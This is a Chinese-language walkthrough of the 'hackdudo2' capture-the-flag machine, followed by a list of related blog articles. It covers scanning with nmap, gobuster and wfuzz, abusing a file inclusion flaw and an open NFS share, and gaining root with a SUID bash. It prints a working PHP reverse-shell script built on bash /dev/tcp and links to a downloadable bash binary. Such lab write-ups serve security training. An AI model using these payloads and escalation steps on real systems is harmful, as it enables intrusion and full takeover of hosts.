hackdudo2解题过程

一、信息收集

1.主机ip确认

复制代码
arp-scan -l

2.端口扫描

复制代码
nmap -T4 -sV -p- -A 192.168.1.227

这里留意一下2049端口开启的nfs服务,后续有用。

3.目录扫描

复制代码
gobuster dir -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u

这里发现file.php文件

访问发现他说这里存在文件访问(file access)

4.参数爆破

复制代码
wfuzz --hw 14 -w /usr/share/wordlists/wfuzz/general/common.txt -u http://192.168.1.227/file.php?FUZZ=../../../etc/passwd

这里爆破出参数file

二、漏洞发现和利用

1.访问http://192.168.1.227/file.php?file=/etc/passwd,可以发现web端存在文件包含漏洞

2.挂载nfs服务

NFS,全称Network File System,即网络文件系统。最大的功能是通过网络,让不同的机器、不同的操作系统可以共享彼此的文件。可以理解为本地多了一个虚拟磁盘。nfs服务的缺点之一是客户端没有用户认证机制。

复制代码
showmount -e 192.168.1.227

发现靶机将/mnt/nfs目录挂出来了,并且给了所有权限 *

创建目录并挂载

复制代码
mkdir /mnt/nfs

mount -t nfs 192.168.1.227:/mnt/nfs /mnt/nfs

找到第一个flag

3.利用nfs进行文件上传,实现反弹shell

写一个php的脚本,并进行端口监听。然后利用web端的文件包含漏洞进行访问执行

php脚本

复制代码
<?php
// 定义目标 IP 和端口
$ip = '192.168.1.148';  // 替换为你的监听机器 IP
$port = 8888;           // 替换为你的监听端口

// 构造 Bash 反弹 Shell 命令
$command = "bash -c 'bash -i >& /dev/tcp/{$ip}/{$port} 0>&1'";

// 执行命令
shell_exec($command);
?>

三、提权

1.利用nfs提权漏洞进行提权,命令:cp /bin/bash . 、chmod u+s bash,chmod +x bash然后在靶机中通过./bash -p来实现提权至root,我这里是因为kali的bash太高,导致提权失败。

我的kali的bash版本比靶机高,所以靶机运行不了

2.如果你也有我的那种问题,可以去找一个低版本的虚拟机,然后把低版本的bash文件拷出来再进行上传。

提权后可以在root目录下找到root.txt文件,那就是最后的flag。

3.如果你的bash版本也高,又懒得去别的虚拟机找低版本的bash文件,那直接下载我的也行。

(我也因为这个文件卡了挺久!!!!看别人文章都不给现成文件受不鸟!)

链接: https://pan.baidu.com/s/1qcyAuwTUmNrmgUSq3Pol7Q?pwd=yucn 提取码: yucn

链接:https://pan.quark.cn/s/64053f4d0ce3

相关推荐
玖玥拾1 小时前
C# 语言进阶(十三)网络 DLL 库分层设计
服务器·开发语言·网络·网络协议·c#
大师兄66681 小时前
HarmonyOS7 HTTP 网络请求封装:统一拦截器实战
网络·网络协议·http·arkui·harmonyos7·实战讲解
bu_shuo1 小时前
计算机二级学习-软件工程基础
学习·软件工程
worilb2 小时前
Spring Cloud 学习与实践(15):使用 TraceId 与 MDC 串联微服务日志
学习·spring cloud·微服务
hbugs0012 小时前
BPF 表达式检查器:一款免费开源的 Wireshark 捕获过滤器语法检查与可视化构建工具
网络·测试工具·开源·eve-ng·bpf
韩曙亮2 小时前
【Flutter】iOS 网络权限设置 ② ( 配置 iOS 平台可使用 HTTP 访问 | ATS 网络安全强制规范 )
网络·flutter·http·ios·https·网络权限·ats
tiantianuser2 小时前
NVME-oF IP 设计1 :为什么要设计它?
网络·网络协议·rdma·roce v2·nvme of
剑藏锋2 小时前
嵌入式学习(46)-基于STM32F407Hal库的DMA乒乓缓存机制
stm32·单片机·学习
笨鸟先飞的橘猫2 小时前
skynet——网络模块学习
网络·学习·skynet
xd1855785552 小时前
鸿蒙PC平台Flutter魔术教学应用开发实践:打造跨端沉浸式魔术学习体验
人工智能·学习·flutter·华为·harmonyos·鸿蒙